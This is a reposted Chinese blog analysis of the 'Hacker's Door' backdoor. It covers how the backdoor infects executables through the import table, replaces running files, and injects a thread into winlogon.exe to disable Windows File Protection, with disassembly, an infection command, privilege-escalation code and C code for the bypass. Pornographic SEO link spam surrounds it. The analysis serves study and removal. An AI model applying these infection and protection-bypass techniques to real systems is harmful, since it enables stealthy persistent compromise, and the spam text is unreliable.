青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

牽著老婆滿街逛

嚴以律己,寬以待人. 三思而后行.
GMail/GTalk: yanglinbo#google.com;
MSN/Email: tx7do#yahoo.com.cn;
QQ: 3 0 3 3 9 6 9 2 0 .

黑客之門的魅力:感染與加載

黑客之門的魅力:感染與加載

??? 最近對后門產生了很濃厚的興趣,上網與各位高手討論的時候,有人提到了“黑客之門”很厲害,也算是推出來的比較成功的一個后門,于是上網下載了一個研究研究,順便也學習學習其中的方法與技巧。不敢獨享,分享于此,同時希望高手們指教。

??? “黑客之門”介紹

??? 黑客之門采用的目前一些先進的后門技術,它只有一個Dll文件,通過感染系統文件啟動自身,被感染的系統文件大小和日期都不會改變;同時采用線程插入技術,本身沒有進程;本身不開端口,而是重用系統進程開的任意一個端口,如80,135,139,445等,因此它的隱藏性非常好,而且穿透防火墻也是很容易的事。這個版本文件不大,只提供一些很有用的命令。目前還沒有發現如何工具能查到這個后門,象Fport,Llister,RKDetector等查工具都失效。
程序的自啟動

??? 既然是一個后門,那么就要隨系統的啟動而啟動,根據黑客之門的介紹,它是通過感染系統程序文件來實現程序的自啟動的。既然是感染了系統文件(像病毒),那就看看感染前和感染后的系統文件的區別吧!為了測試感染前后的差別,我準備了一個專門用來被感染的文件TestLoad.exe,它沒有什么功能,只是彈出一個對話框,這樣好等待測試,麻雀雖小,五臟俱全,省得動系統文件了。接著運行命令:

C:>rundll32 hkdoordll,DllRegisterServer TestLoad.exe 2
使黑客之門感染TestLoad.exe,感染完畢后用EXE文件查看利器eXescope查看TestLoad.exe被感染前后的差別。

被感染之前eXescpoe顯示的TestLoad.exe的結構如圖1所示:

感染之后的TestLoad.exe的結構如圖2所示:

可以看出感染之后的TestLoad.exe的引入表多了一個Hkdoordll.dll引入庫。細心觀察感染之后的TestLoad.exe的引入表地址(Import Table Address ITA)已經被改變,原來的ITA為0x000043FC,感染之后為0x0000477E。
為了進一步看清除感染前后的文件的變化,這里使用LordPE.exe比較感染前后的TestLoad.exe的引入表函數,比較結果如圖3所示:

提示:使用LordPE.exe查看exe文件的引入表函數方法是:點擊PE Edito打開相應的文件,接著點擊Directories,彈出對話框后點擊Import Table右邊的三個點,這樣就可以查看一個可執行文件的引入表了。

??? 可以看出,只是在引入表鏈表中添加了一個相應的Hkdoordll.dll,這樣當被感染的程序再次運行時,由系統的程序裝載器搜索Hkdoordll.dll,并將其引用到被感染程序的地址空間,后門就運行起來了。黑客之門的這種子啟動方式值得學習,比較靈巧。

??? 搞明白了黑客之門的啟動方式后,我們就可以手動清除它了,這里切不可將Hkdoordll.dll直接刪除,這樣可能直接導致系統崩潰。因為系統在加載被感染的程序(假如為Services.exe)時發現沒有找到Hkdoordll.dll,Services.exe將不能被裝載,如果被感染的是系統關鍵進程的話,那么系統將不能正確的啟動。清除的時候我們可以去別的機器上(相同系統與補丁)找一個Services.exe,將被感染的程序命名為Services2.exe,將Services.exe拷貝到System32文件夾下,重啟電腦,刪除Hkdoordll.dll就清除黑客之門了。
運行時感染

??? 上面說的是黑客之門的自啟動方式,下面看看黑客之門是怎么感染正在運行的系統文件的,這一點讓我暈了很久,最后發現是用了一個很靈活的小技巧。
我們知道在Windows系統下,正在運行的程序文件一般是不能修改或者刪除的,正是由于這一點,才出現了各種程序運行時的自刪除大法,程序自刪除不是我們這次的重點。但是,細心的用戶可能已經發現,在Windows 2000或Wndows XP系統下,我們可以對正在運行的EXE文件進行重命名或者移動。
再拿剛才的TestLoad.exe做測試,運行:

C:>rundll32 hkdoordll,DllRegisterServer TestLoad.exe 2
可以發現TestLoad.exe所在的文件夾內多出了一個文件TestLoad.exe.bak,咋一看還以為“黑客之門”做好事,自動幫你備份一下系統文件,其實這可是黑客之門的狐貍尾巴啊!是它不得已而為之的。不要關閉TestLoad.exe,然后試著刪除TestLoad.exe和TestLoad.exe.bak,是不是發現奇跡了?竟然把TestLoad.exe刪掉了,而TestLoad.exe.bak竟然不讓刪,是不是和我剛才說的話矛盾?非也!非也!剛好證明了剛才的話:黑客之門先把TestLoad.exe改名為TestLoad.exe.bak,然后生成一個被感染的TestLoad.exe,這樣,下次運行TestLoad.exe實際上是被替換過的程序,原來的程序則放在一邊。
用IDA Pro反匯編Hkdoordll.dll可以發現以下函數的調用:

文件重命名:

.data:1000C618???????????????? lea???? ecx, [esp+438h+FileName]
.data:1000C61F???????????????? lea???? edx, [esp+438h+var_324]
.data:1000C626???????????????? push??? ecx
.data:1000C627???????????????? push??? edx
.data:1000C628???????????????? call??? rename

拷貝文件:

.data:1000C66F?????????? lea???? edx, [esp+440h+var_32C]
.data:1000C676?????????? push??? 0?????????????? ; bFailIfExists
.data:1000C678?????????? lea???? eax, [esp+444h+var_228]
.data:1000C67F?????????? push??? edx???????????? ; lpNewFileName
.data:1000C680?????????? push??? eax???????????? ; lpExistingFileName
.data:1000C681?????????? call??? CopyFileA

移動文件:

.data:1000C795?????????? mov???? eax, [ebp+8]
.data:1000C798?????????? test??? eax, eax
.data:1000C79A?????????? jnz???? short loc_1000C7FE
.data:1000C79C?????????? lea???? ecx, [esp+448h+var_334]
.data:1000C7A3?????????? push??? 5?????????????? ; dwFlags
.data:1000C7A5?????????? lea???? edx, [esp+44Ch+var_230]
.data:1000C7AC?????????? push??? ecx???????????? ; lpNewFileName
.data:1000C7AD?????????? push??? edx???????????? ; lpExistingFileName
.data:1000C7AE?????????? call??? MoveFileExA
上面的語句實際上可以理解為:
MoveFileEx(“TestLoad.exe”,”TestLoad.exe.bak”, MOVEFILE_DELAY_UNTIL_REBOOT&line; MOVEFILE_REPLACE_EXISTING);

??? 小知識:MSDN中對MoveFileEx()函數的解釋為:
BOOL MoveFileEx(
? LPCTSTR lpExistingFileName,? // pointer to the name of the existing file
? LPCTSTR lpNewFileName,?????? // pointer to the new name for the file
? DWORD dwFlags??????????????? // flag that specifies how to move file
);

??? 這樣進程TestLoad.exe的文件映象實際上為TestLoad.exe.bak,接著Hkdoordll.dll生成被感染的TestLoad.exe,并且保存在原來的文件路徑上即可。

??? 滅掉系統文件保護

??? 一旦系統啟動了,Windows系統就開始加載已經被感染的系統程序,但是由于“黑客之門”是通過感染系統程序實現自啟動的,這下子又遇到了另外一個問題。

??? 大家都知道,在Windows 2000和Windows XP中有系統文件保護功能,一旦被保護的系統文件被修改了,就會彈出需要插入系統安裝盤CD的對話框。這樣就導致了一個問題, TestLoad.exe只是一個普通的EXE文件,而不是受系統文件保護系統保護的系統進程,那為什么黑客之門修改系統進程時,操作系統的文件的文件保護系統不會提醒呢?
這一點,還是采用反匯編黑客之門的方法,觀察它是怎樣關閉系統文件保護功能的。

發現如下的代碼:

.data:1000BBB0 LoadSFCDLL?? proc near??? ; CODE XREF: sub_1000BC70+B7
.data:1000BBB0????? push??? esi
.data:1000BBB1????? xor???? esi, esi
.data:1000BBB3????? call??? GetVersion? ; Get current version number of Windows
.data:1000BBB3????? ; and information about the operating system platform
.data:1000BBB9????? cmp???? al, 5
.data:1000BBBB????? jnz???? short loc_1000BBDF
.data:1000BBBD????? xor???? ecx, ecx?;此時為Windows2000系統
.data:1000BBBF????? mov???? cl, ah
.data:1000BBC1???? test??? cl, cl
.data:1000BBC3???? jnz???? short loc_1000BBD2
.data:1000BBC5???? push??? offset aSfc_dll ; lpLibFileName
.data:1000BBCA???? call??? LoadLibraryA?;此時為WindowsXP系統
.data:1000BBD0???? pop???? esi
.data:1000BBD1???? retn
.data:1000BBD2 loc_1000BBD2:????????? ; CODE XREF: LoadSFCDLL+13 j
.data:1000BBD2???? push??? offset aSfc_os_dll ; lpLibFileName
.data:1000BBD7???? call??? LoadLibraryA
.data:1000BBDD???? pop???? esi
.data:1000BBDE???? retn

上面的代碼可以看出,Hkdoordll.dll根據操作系統的版本調用了Sfc.dll或者Sfc_os.dll,如果是Windows 2000(Windows NT 5.0)的話,裝載Sfc.dll;如果是Windows XP(Windows NT 5.1)的話,裝載Sfc_os.dll。再看下面的一段反匯編代碼:

sub???? esp, 228h
.data:1000BC76???? lea???? eax, [esp+228h+hObject]
.data:1000BC7A???? push??? ebx
.data:1000BC7B???? push??? esi
.data:1000BC7C???? push??? edi
.data:1000BC7D???? push??? offset aWinlogon_exe ; "winlogon.exe"
.data:1000BC82????? push??? 0
.data:1000BC84????? push??? offset aDS????? ; "%d/%s"
.data:1000BC89????? push??? 1Fh
.data:1000BC8B???? mov???? edi, ecx
.data:1000BC8D???? push??? eax
.data:1000BC8E???? call??? sub_10008C60
.data:1000BC93????? add???? esp, 14h
.data:1000BC96????? lea???? ecx, [esp+234h+hObject]
.data:1000BC9A????? push??? ecx???????????? ; lpMultiByteStr
.data:1000BC9B????? call??? sub_100016CC??? //這個子函數就是用來得到進程ID
.data:1000BCA0????? cmp???? eax, 0FFFFFFFDhSFC
.data:1000BCA3????? jb????? short loc_1000BCDB
.data:1000BCA5????? push??? offset aCanTGetWinlogo ; "Can't get winlogon process id!rn"

上面的函數用來得到Winlogon.exe進程的ID,以便下面打開它注入代碼:

.data:1000BCDB?????? push??? eax???????????? ; dwProcessId
.data:1000BCDC?????? push??? 0?????????????? ; bInheritHandle
.data:1000BCDE?????? push??? 1F0FFFh???????? ; dwDesiredAccess
.data:1000BCE3?????? call??? OpenProcess?;打開目標進程
.data:1000BCE9?????? mov???? ebx, eax
.data:1000BCEB?????? test??? ebx, ebx
.data:1000BCED?????? jnz???? short loc_1000BD25

上面的匯編代碼段是調用OpenProcess()函數打開Winlogon.exe進程。繼續觀察反匯編代碼,發現下面的一段:

.data:1000BD25?????? mov?? ecx, edi
.data:1000BD27?????? call??? LoadSFCDLL
.data:1000BD2C?????? mov?? esi, eax
.data:1000BD2E?????? test??? esi, esi
.data:1000BD30?????? jnz??? short loc_1000BD6F
.data:1000BD6F?????? push?? 2????????????? ;函數序號為2
.data:1000BD71?????? push?? esi???????????? ;SFC.dll的 hModule
.data:1000BD72?????? call??? GetProcAddress ;得到SFC.dll中序數為2 的函數的地址
.data:1000BD78?????? test??? eax, eax
.data:1000BD7A?????? mov???? [edi+10h], eax
.data:1000BD7D?????? jnz???? short loc_1000BDC3

可以發現上面的匯編代碼用來得到以前裝載的Sfc.dll(或Sfc_os.dll)中的序數為2的函數的地址。接著程序跳轉到了Loc_1000BDC3,繼續跟蹤反匯編代碼,發現以下一段:

.data:1000BDC3?????? push??? eax???????????? ; 剛才得到的SFC.dll中函數的地址
.data:1000BDC4?????? push??? ebx???????????? ; Winlogon.exe進程的句柄
.data:1000BDC5?????? mov???? ecx, edi
.data:1000BDC7?????? call??? sub_1000BBF0?注意這里調用函數 sub_1000BBF0
.data:1000BDCC?????? push??? esi???????????? ; hLibModule
.data:1000BDCD?????? mov???? edi, eax
.data:1000BDCF?????? call??? FreeLibrary
.data:1000BDD5?????? test??? edi, edi
.data:1000BDD7?????? push??? ebx???????????? ; hObject
跟進Sub_1000BBF0函數,Sub_1000BBF0函數:
入口參數:進程句柄、線程開始地址
.data:1000BBF0 sub_1000BBF0??? proc near???? ; CODE XREF: sub_1000BC70+157 p
.data:1000BBF0
.data:1000BBF0 ThreadId??????? = dword ptr -1
.data:1000BBF0 hProcess??????? = dword ptr? 7
.data:1000BBF0 lpStartAddress? = dword ptr? 0Bh
.data:1000BBF0
.data:1000BBF0?????? push??? ecx
.data:1000BBF1?????? mov???? ecx, [esp+1+lpStartAddress]
.data:1000BBF5?????? mov???? edx, [esp+1+hProcess]
.data:1000BBF9?????? lea???? eax, [esp+1+ThreadId]
.data:1000BBFD?????? push??? esi
.data:1000BBFE?????? push??? eax?????? ; lpThreadId
.data:1000BBFF?????? push??? 0???????? ; dwCreationFlags
.data:1000BC01?????? push??? 0???????? ; lpParameter
.data:1000BC03?????? push??? ecx?????? ; SFC.dll中第二個函數的函數地址
.data:1000BC04?????? push??? 0???????? ; dwStackSize
.data:1000BC06?????? push??? 0???????? ; lpThreadAttributes
.data:1000BC08?????? push??? edx?????? ; 以前打開的winlogon.exe進程的句柄
.data:1000BC09?????? mov???? [esp+21h+ThreadId], 0
.data:1000BC11?????? call??? CreateRemoteThread??? ;創建遠線程
.data:1000BC17?????? mov???? esi, eax
.data:1000BC19?????? test??? esi, esi??;ESI保存剛才新創建的線程的句柄
.data:1000BC1B?????? jnz???? short loc_1000BC3F
――――――――――――――――――――――――――――――
.data:1000BC3F
.data:1000BC3F loc_1000BC3F:???? ; CODE XREF: sub_1000BBF0+2B j
.data:1000BC3F????????? push??? 0FA0h?????????? ; dwMilliseconds
.data:1000BC44????????? push??? esi???????????? ; 新創建的線程的句柄
.data:1000BC45????????? call??? WaitForSingleObject ;等待遠程線程的結束
.data:1000BC4B????????? test??? eax, eax
.data:1000BC4D????????? jz????? short loc_1000BC5D
――――――――――――――――――――――――――――――――――
.data:1000BC5D
.data:1000BC5D loc_1000BC5D:???????? ; CODE XREF: sub_1000BBF0+5D j
.data:1000BC5D????????? push??? esi???????????? ; hObject
.data:1000BC5E????????? call??? CloseHandle
.data:1000BC64?????????? mov???? eax, [esp+5+ThreadId]
.data:1000BC68?????????? pop???? esi
.data:1000BC69?????????? pop???? ecx
.data:1000BC6A?????????? retn??? 8
.data:1000BC6A sub_1000BBF0??? endp

??? 上面的子函數功能很簡單,就是在剛剛打開的Winlogon.exe進程中創建新的線程,新線程調用SFC.dll中的序號為2的輸出函數,這樣便關掉了系統文件的自我保護。

??? 事實上,根據Bgate的《在Win 2000/XP上安靜地替換正在使用的系統文件》這篇文章的解釋,在Windows 2000(XP)系統下,執行系統文件保護的代碼在Sfc.dll(XP在Sfc_os.dll)中,這個Dll由Winlogon.exe調用。Winlogon.exe主要調用Sfc.dll中的兩個函數實現系統文件文件保護。Winlogon.exe調用Sfc.dll中的一個輸出函數在系統啟動的時候創建了一系列事件,Winlogon.exe結束時調用另外一個函數關閉上面的一系列事件,這樣就關閉了系統保護文件功能。那這樣我們只需要向Winlogon.exe中注入代碼調用“第二個”函數,就能取消文件保護功能了,“黑客之門”采用的也正是這樣的方法。

??? 這里需要注意的是,要把進程注入到Winlogon.exe中,需要提升自身的權限到Debug權限。

HANDLE hToken;
??? LUID DebugNameValue;
??? TOKEN_PRIVILEGES Privileges;
??? DWORD dwRet;

??? OpenProcessToken(GetCurrentProcess(),
????? TOKEN_ADJUST_PRIVILEGES &line; TOKEN_QUERY,hToken);
??? LookupPrivilegeValue(NULL,"SeDebugPrivilege",&DebugNameValue);
??? Privileges.PrivilegeCount=1;
??? Privileges.Privileges[0].Luid=DebugNameValue;
??? Privileges.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
??? AdjustTokenPrivileges(hToken,FALSE,&Privileges,sizeof(Privileges),
????????????????? NULL,&dwRet);
??? CloseHandle(hToken);

上面整個關閉系統文件保護功能的實現用C語言寫下來如下所示:

/*得到進程的ID,具體的方法可以使用CreateToolHelpSnap32(),ProcessFirst32()以及ProcessNext32()得到*/
?DWORD dwPid=GetProcessIdFromName(“Winlogon.exe”);
HANDLE Process=OpenProcess(,FALSE,dwPid);
DWORD dwVersion;
?HMODULE hSfc;
dwVersion = GetVersion();
//判斷操作系統的類型
?? if ((DWORD)(LOBYTE(LOWORD(dwVersion))) == 5)
{ ??????????????? // Windows 2000/XP
??????? if((DWORD)(HIBYTE(LOWORD(dwVersion))) == 0)?? //Windows 2000
?????????????????? hSfc = LoadLibrary("sfc.dll");??????
??????? else if((DWORD)(HIBYTE(LOWORD(dwVersion))) = 1)???????????? //Windows XP
??????????? hSfc = LoadLibrary("sfc_os.dll");??????
??? }???
//得到函數的地址
FARPROC dwAddress=GerProcAddress(hSfc, MAKEINTRESOURCE(2));
DWORD dwThreadId;
HANDLE? hThread;
//創建遠線程
hThread =CreateRemoteThread(hProcess,0,0, /
(DWORD (__stdcall *) (void *)) dwAddress,0,0,&dwThreadId);
WaitForSingleObject(hThread,0x0FA0);

??? 結束語

??? 大概分析完了,剛開始拿到黑客之門的時候,還在想,它到底是怎樣感染正在運行的系統文件的呢?原來以為是修改進程的句柄指向的進程的操作掩碼完成的,為此我還翻閱了好多文檔。結果通過對程序的反匯編學習,漸漸的發現黑客之門的程序編制的技巧。這里也要感謝“黑客之門”的作者,沒有給它加殼,能讓我們有幸能一睹優秀黑客工具的容顏!
不到之處,歡迎指教,Mail:fengcaho at 163 dot com


posted on 2006-05-08 17:49 楊粼波 閱讀(366) 評論(0)  編輯 收藏 引用 所屬分類: 文章收藏

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            久久国产欧美日韩精品| 欧美中文字幕视频| 性一交一乱一区二区洋洋av| 亚洲午夜精品17c| 亚洲无人区一区| 亚洲一区国产| 久久狠狠一本精品综合网| 久久精品日产第一区二区| 久久亚洲不卡| 欧美激情五月| 一区二区三区免费网站| 亚洲欧美日本精品| 久久久久久久久久久成人| 久久伊人一区二区| 女同性一区二区三区人了人一| 欧美了一区在线观看| 国产欧美一区二区精品婷婷 | 国产女精品视频网站免费 | 欧美成人免费va影院高清| 欧美三区在线视频| 国产亚洲欧美一区在线观看| 91久久极品少妇xxxxⅹ软件| 欧美日韩一区视频| 欧美一区二区三区视频| 亚洲国内精品| 一区二区三区免费看| 欧美成人午夜视频| 亚洲精品一二三| 久久一区二区三区超碰国产精品| 欧美日韩视频在线一区二区观看视频| 国产在线乱码一区二区三区| 亚洲视频欧美视频| 亚洲日本va在线观看| 久久夜色精品| 亚洲日本一区二区| 亚洲国产精品www| 美女精品在线观看| 永久免费精品影视网站| 久久黄色小说| 亚洲欧美视频在线观看视频| 亚洲桃花岛网站| 久久精品成人一区二区三区| 欧美日韩视频在线一区二区| 亚洲成色精品| 久久精品一本| 午夜亚洲视频| 国产精品视频免费在线观看| 一区二区三区免费看| 亚洲国产成人av| 久久乐国产精品| 国产亚洲人成网站在线观看| 亚洲欧美一区二区三区久久| 在线中文字幕日韩| 欧美日韩在线看| 中文av字幕一区| 99精品视频免费| 欧美日韩在线一区| 99国产精品国产精品久久| 久久精品盗摄| 欧美日韩在线三区| 久久久久国产成人精品亚洲午夜| 亚洲精品在线免费| 久久综合伊人77777麻豆| 亚洲欧美电影在线观看| 国产精品一区=区| 欧美一区二区三区免费视| 亚洲欧美韩国| 国内精品美女在线观看| 国产精品久久久久久久久久免费| 欧美成人精品一区二区三区| 亚洲国产aⅴ天堂久久| 蜜桃av综合| 久久亚洲综合色| 亚洲激情影视| 亚洲另类视频| 国产精品久久久久久户外露出| 欧美一二三视频| 久久激情综合网| 亚洲人www| 夜色激情一区二区| 国产日韩欧美精品| 欧美v日韩v国产v| 欧美日韩mv| 欧美综合激情网| 蜜臀av性久久久久蜜臀aⅴ| 一本色道88久久加勒比精品| 亚洲一区国产精品| 一区二区视频欧美| 99综合电影在线视频| 国产一区二区0| 亚洲第一主播视频| 国产精品乱子久久久久| 老司机免费视频一区二区| 欧美乱妇高清无乱码| 久久久精品久久久久| 免费高清在线一区| 亚洲欧美视频一区| 男人的天堂亚洲在线| 亚洲一区二区三区成人在线视频精品 | 亚洲免费视频一区二区| 久久精品视频播放| 亚洲午夜一区| 玖玖在线精品| 欧美一区二区三区在线| 欧美激情免费观看| 老司机免费视频久久| 国产欧美韩日| 一区二区黄色| 日韩视频在线一区| 久久久久久尹人网香蕉| 午夜欧美理论片| 欧美日本精品| 亚洲第一福利社区| 一区在线视频观看| 午夜精品在线观看| 亚洲一区二区三区四区五区午夜 | 欧美日本高清一区| 欧美国产精品劲爆| 亚洲色图自拍| 一本色道久久综合狠狠躁篇怎么玩| 久久国产色av| 久久精品电影| 国产精品一区二区三区久久| 日韩午夜av电影| 亚洲精品一二| 欧美承认网站| 亚洲大胆av| 亚洲激情成人在线| 久久se精品一区二区| 亚洲人成网站在线播| 在线观看日韩www视频免费| 羞羞视频在线观看欧美| 亚洲欧洲av一区二区| 国产精品草草| 亚洲图片在线| 新片速递亚洲合集欧美合集| 欧美网站大全在线观看| 99精品福利视频| 一本到高清视频免费精品| 欧美日韩视频专区在线播放| 在线一区免费观看| 香蕉乱码成人久久天堂爱免费 | 亚洲天堂激情| 国产精品户外野外| 亚洲欧美国产精品va在线观看| 亚洲综合第一| 国产情人节一区| 久久精品国产第一区二区三区| 久久综合色婷婷| 亚洲精品国产精品乱码不99按摩| 欧美成人网在线| 日韩亚洲一区二区| 欧美亚洲视频在线观看| 韩国一区二区三区美女美女秀| 久久免费国产精品| 亚洲精品国产视频| 中文欧美在线视频| 国产精品综合网站| 久久久www成人免费无遮挡大片 | 欧美一区综合| 在线观看视频一区二区欧美日韩| 裸体女人亚洲精品一区| 亚洲免费观看| 久久婷婷国产综合国色天香| 亚洲国产女人aaa毛片在线| 欧美日韩人人澡狠狠躁视频| 香蕉亚洲视频| 亚洲精品久久久久久久久久久久久| 亚洲综合国产| 亚洲国产视频一区| 国产精品久久午夜| 免费看成人av| 欧美亚洲三区| 亚洲美女在线视频| 久久男人资源视频| 亚洲午夜精品| 亚洲精品国偷自产在线99热| 国产精品亚洲综合天堂夜夜 | 欧美激情精品久久久| 亚洲欧美日韩天堂| 亚洲人成毛片在线播放| 久久三级视频| 性欧美大战久久久久久久久| 亚洲精品美女久久7777777| 国产日韩欧美视频| 欧美视频成人| 欧美黄污视频| 久久精品九九| 欧美一区=区| 亚洲一区久久久| 日韩午夜三级在线| 欧美黄免费看| 麻豆久久久9性大片| 欧美在线地址| 99视频超级精品| 亚洲第一精品电影| 久久综合网hezyo| 久久超碰97中文字幕| 亚洲一区国产视频| 亚洲网站在线看|